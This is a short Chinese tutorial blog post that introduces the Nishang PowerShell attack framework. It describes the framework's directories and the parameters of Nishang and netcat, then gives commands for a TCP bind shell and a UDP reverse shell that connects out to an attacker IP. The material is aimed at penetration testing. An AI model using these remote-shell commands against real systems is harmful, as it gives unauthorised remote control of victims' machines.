基础篇:内网工具Nishang PowerShell

目录

Nishang介绍

NiShang目录介绍

Nishang参数

NC参数

基于TCP协议的powershell交互式shell

Nishang介绍

Nishang是一个PowerShell攻击框架,它是Powershell攻击脚本和有效载荷的一个集合,Nishang被广泛应用于渗透测试的各个阶段

Nishang下载

NiShang目录介绍

        ActiveDirectory:活动目录

        Antak-Webshell:在内存中执行PowerShell脚本,运行命令,并使用此Webshell下载和上传文件

        Backdoors:一个后门,可以从第三方网站接收指令,并在内存中执行PowerShell脚本

        Bypass:实施公告已知方法来绕过

        Client:客户端

        Escalationl:当需要权限时提取

        Executionl:命令执行RCE

        Gatherl信息收集

        MITE:用于MITM攻击的本地HTTOS代理

        Misc:脚本

        Piovt:跳板

        Prasadhak:对照VirusTotal数据库检查正在进行的进程的运行哈希

        Scan:扫描

        Shells:shell

        Utility:杂项

        Powerpreter:Meterpreter会话

Nishang参数

        -IPAddress方向连接时需要连接到的IP地址

        -Port反向连接时是需要连接到的端口,选择-Bind选项时是需要监听端口

        -Reverse反向连接

        -Bind正向连接用到的端口监听

NC参数

        -n 直接使用ip地址,而不通过域名服务器

        -v 显示指令执行过程

        -l 使用监听模式 管控传入的资料 (适合反向连接)

        -p 设置本地主机使用的通信端口

基于TCP协议的powershell交互式shell

        Invoke-PowerShellTcp是PowerShell交互式正向或反向连接shell 

靶机执行:./Invoke-PowerShellTcp.ps1    Invoke-PowerShellTcp -Bind -Port 6666

        在攻击机上使用nc工具正向连接目标主机

攻击机:nc -nv <Inovke-Powershell开启交互式的靶机ip> 6666

基于UDP协议的交互式反弹shell     

靶机执行:./Invoke-PowerShellUdp -Reverse -IPAddress <攻击机的ip> -port 555

        在攻击机使用nc工具反向连接目标主机 

攻击机:nc -luvp 555

  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值